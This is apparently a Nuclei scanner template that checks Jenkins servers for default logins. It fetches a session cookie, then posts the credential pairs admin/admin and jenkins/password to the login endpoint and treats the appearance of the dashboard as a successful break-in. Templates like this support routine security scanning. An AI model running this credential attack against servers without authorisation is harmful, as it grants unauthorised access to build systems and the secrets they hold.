id: jenkins-weak-password

info:
  name: Jenkins Weak Password
  author: Zandros0
  severity: high
  tags: jenkins,default-login

requests:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /j_spring_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{cookie}}

        j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{cookie}}

    attack: pitchfork
    payloads:
      username:
        - admin
        - jenkins
      password:
        - admin
        - password

    extractors:
      - type: regex
        name: cookie
        internal: true
        part: header
        regex:
          - 'JSESSIONID\..*=([a-z0-9.]+)'

    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains(body_3, "/logout")'
          - 'contains(body_3, "Dashboard [Jenkins]")'
